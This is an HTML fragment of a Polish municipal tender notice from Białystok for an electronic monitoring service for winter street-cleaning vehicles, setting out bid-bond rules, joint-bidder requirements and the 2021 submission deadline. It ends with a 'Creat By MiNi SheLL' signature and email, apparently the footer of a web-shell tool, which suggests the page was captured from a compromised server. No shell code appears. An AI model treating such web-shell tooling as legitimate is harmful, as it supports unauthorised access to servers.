fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykonawca składa oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez Zamawiającego.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Każda oferta musi być zabezpieczona wadium o wartości: 6 000,00 zł.<br/>2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia<br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3. Wadium wnoszone w formie pieniężnej należy wpłacić PRZELEWEM na rachunek bankowy w<br/>Banku Pekao S.A. nr 37 1240 5211 1111 0010 3553 7299. W tytule wpłaty należy wpisać:<br/>Wadium – Usługa Elektronicznego Systemu Kontroli Pojazdów biorących udział w zimowym<br/>oczyszczaniu miasta Białegostoku.<br/>4. Wadium składane w pozostałych formach powinno być wniesione w oryginale w postaci<br/>elektronicznej, poprzez załączenie na Platformie w zakładce „OFERTY”, wybierając polecenie<br/>„dodaj dokument".<br/>5. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą. Za skuteczne wniesienie wadium w pieniądzu Zamawiający<br/>uważa wadium, które w tym terminie znajdzie się na koncie Zamawiającego. W przypadku<br/>wniesienia wadium w formie gwarancji (lub poręczeń) powinna ona obejmować pełny okres<br/>związania ofertą.<br/>6. Zamawiający odrzuci ofertę jeżeli Wykonawca nie wniósł wadium, lub wniósł w sposób<br/>nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub<br/>złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp.<br/>7. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą,<br/>2) zawarcia umowy w sprawie zamówienia publicznego,<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało<br/>rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>8. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku<br/>zwraca wadium Wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert,<br/>2) którego oferta została odrzucona,<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem Wykonawcy, którego oferta została wybrana<br/>jako najkorzystniejsza,<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie<br/>na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>9. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w<br/>formie gwarancji lub poręczenia, występuje odpowiednio do gwaranta lub poręczyciela z<br/>żądaniem zapłaty wadium, jeżeli:<br/>1) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 lub art. 128 ust. 1<br/>ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków<br/>dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o<br/>których mowa<br/>w art. 57 lub art. 106 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy<br/>Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której<br/>mowa w art. 223 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty<br/>złożonej przez Wykonawcę jako najkorzystniejszej;<br/>2) Wykonawca, którego oferta została wybrana:<br/>a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych<br/>w ofercie,<br/>b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn<br/>leżących po stronie Wykonawcy, którego oferta została wybrana. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego (pełnomocnictwo należy dołączyć do oferty).<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w celu potwierdzenia, że Wykonawca nie podlega wykluczeniu:<br/>1) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp (na lub wg załącznika nr 2. do<br/>SWZ) - składa każdy Wykonawca do oferty,<br/>2) oświadczenie, o którym mowa w rozdz. VIII pkt 1 SWZ - składa każdy z Wykonawców na<br/>wezwanie Zamawiającego, <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały określone w § 11 projektu<br/>umowy (załącznik nr 3 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-25 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miastobialystok.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-25 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com